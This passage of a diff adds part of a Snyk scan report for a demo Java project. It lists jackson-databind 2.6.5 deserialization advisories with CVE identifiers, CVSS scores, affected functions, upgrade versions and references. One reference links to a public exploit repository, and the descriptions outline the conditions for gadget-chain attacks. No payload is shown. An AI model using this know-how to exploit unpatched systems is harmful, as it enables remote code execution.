"2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + 
"moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", 
+ "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + 
"artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + 
], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + 
"functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": 
"GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. 
An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": 
"CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": 
"2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as 